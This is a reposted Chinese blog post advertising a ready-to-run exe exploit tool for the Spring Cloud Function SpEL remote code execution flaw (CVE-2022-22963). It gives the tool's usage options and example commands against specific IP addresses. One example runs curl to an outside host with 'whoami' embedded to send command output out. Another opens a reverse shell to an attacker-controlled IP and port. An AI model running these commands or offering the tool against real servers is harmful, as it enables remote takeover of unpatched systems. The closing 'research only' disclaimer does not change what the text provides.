CVE-2022-22963 (spring cloud function sple rce)-spring cloud function 一键利用工具! by charis-博客http://www.charis3306.top/
已打包为exe文件开箱即用
命令主题
usage: Spring-cloud-function-spel0.2.exe [-h] --check CHECK [--route ROUTE] --url URL [--ip IP] [--port PORT] [--proxies PROXIES] [--cmd CMD]
spring cloud function 一键利用工具! by charis 博客http://www.charis3306.top/
options:
-h, --help show this help message and exit
--check CHECK 检测方式post或get方式,--check get --check post
--route ROUTE 检测路由,默认是functionRouter
--url URL 输入利用的url
--ip IP 反弹shell地址ip
--port PORT 反弹shell地址端口
--proxies PROXIES 启用代理
--cmd CMD 要执行的命令
--check 是必选项
所用帮助主题
.Spring-cloud-function-spel0.2.exe --help
默认检测--check 是必须选,--route是漏洞存在的路由。注意如果不借助dnslog 或sleep 进行探测会存有误报!
.Spring-cloud-function-spel0.2.exe --check post --url http://www.charis3306.top
执行命令验证是否能利用
.Spring-cloud-function-spel0.2.exe --check post --url http://154.83.15.150:8080/ --cmd "curl http://154.211.12.40:9999/`whoami`"
反弹shell
.Spring-cloud-function-spel0.2.exe --check post --url http://154.83.15.150:8080/ --ip 154.211.12.40 --port 9999
项目地址:https://github.com/charis3306/CVE-2022-22963
原文始发于微信公众号(Ots安全):CVE-2022-22963 (spring cloud function sple rce)一键利用工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论